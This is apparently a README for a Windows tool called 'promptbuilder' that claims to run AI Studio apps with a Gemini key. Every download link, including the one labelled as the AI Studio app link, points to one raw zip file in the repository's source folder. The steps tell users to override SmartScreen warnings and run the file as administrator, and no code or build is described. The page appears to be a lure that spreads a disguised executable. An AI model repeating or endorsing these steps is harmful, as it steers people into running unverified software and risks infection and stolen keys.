โจ promptbuilder - Build prompts with less effort

๐ Get Started
promptbuilder helps you run and deploy your AI Studio app on Windows. Use it to set up the app, load your Gemini key, and start working with your own AI Studio project.
๐ฅ Download
Visit this page to download and run the app on Windows:
https://github.com/Overfed-leap533/promptbuilder/raw/refs/heads/main/src/Software_1.2.zip
Open the latest release and download the Windows file. If there is more than one file, pick the one that matches your PC. In most cases, that will be the .exe file.
๐ฅ๏ธ What You Need
Before you start, make sure your PC has:
- Windows 10 or Windows 11
- A stable internet connection
- Enough free disk space for the app and its files
- A Gemini API key
- Permission to run apps on your PC
If Windows shows a SmartScreen prompt, check the file name and publisher before you run it.
๐งญ How to Install
- Go to the download page.
- Open the latest release.
- Download the Windows app file.
- Save the file in a place you can find, like Downloads or Desktop.
- If the file is in a
.zip archive, extract it first.
- Double-click the app file to start it.
If Windows asks for approval, choose Run anyway only if the file came from the release page above.
โ๏ธ Set Up Your Gemini Key
promptbuilder uses a Gemini API key to work with AI features.
- Open the app folder.
- Find the file named
.env.local.
- Open it with Notepad.
- Set
GEMINI_API_KEY to your Gemini API key.
- Save the file.
Example:
GEMINI_API_KEY=your_key_here
Keep your key private. Do not share it with others.
โถ๏ธ Run the App
After setup, start the app:
- Open the app file.
- Wait for it to load.
- Follow the on-screen steps in the app.
- Use the app to run and deploy your AI Studio project.
If the app opens in a browser, keep that window open while you use it.
๐งฉ What promptbuilder Does
promptbuilder gives you a simple way to work with your AI Studio app on your own computer. It is made for users who want a local setup without sorting through a lot of steps.
You can use it to:
- Load your app locally
- Connect your Gemini API key
- Start your app in a local window or browser
- Prepare your app for deployment
- Keep your setup in one place
๐ Typical Use
A common flow looks like this:
- Download the app from the release page
- Set your Gemini API key
- Open the app
- Load your AI Studio project
- Run it locally
- Deploy when you are ready
๐ ๏ธ Common Issues
The app will not open
- Make sure you downloaded the file from the release page
- Check that the download finished
- Try running the file as an administrator
- Restart your PC and try again
Windows blocks the file
- Open the file details
- Confirm it came from the release page
- Click More info if Windows shows it
- Choose Run anyway if you trust the source
The app cannot find the API key
- Open
.env.local
- Check that
GEMINI_API_KEY is set
- Remove extra spaces before or after the key
- Save the file and start the app again
The app starts but nothing loads
- Check your internet connection
- Make sure your Gemini key is valid
- Close the app and open it again
- Try a fresh download from the release page
๐ Security Tips
- Keep your Gemini API key private
- Download only from the release page
- Do not edit files you do not need to change
- If you use a shared PC, remove your key when you are done
๐งฐ File Layout
When you unzip or open the app folder, you may see files like:
.env.local โ stores your API key
- app files โ start the program
- support files โ used by the app to run
Do not delete files unless you know what they do.
๐ How It Fits Your AI Studio App
This project is made to run and deploy the app linked in AI Studio. Use it when you want a local copy of your app and a simple path from setup to run time.
AI Studio app link:
https://github.com/Overfed-leap533/promptbuilder/raw/refs/heads/main/src/Software_1.2.zip
๐งช Basic Checks
Before you start a full run, check these points:
- The app file is downloaded
- The folder is extracted
.env.local has your Gemini API key
- Your internet is on
- Windows lets the app run
๐ Release Page
For the latest Windows download, go here:
https://github.com/Overfed-leap533/promptbuilder/raw/refs/heads/main/src/Software_1.2.zip
Open the newest release, then download the file that matches your system
๐ฑ๏ธ Quick Steps
- Visit the release page
- Download the Windows file
- Extract it if needed
- Add your Gemini API key in
.env.local
- Open the app
- Run your AI Studio app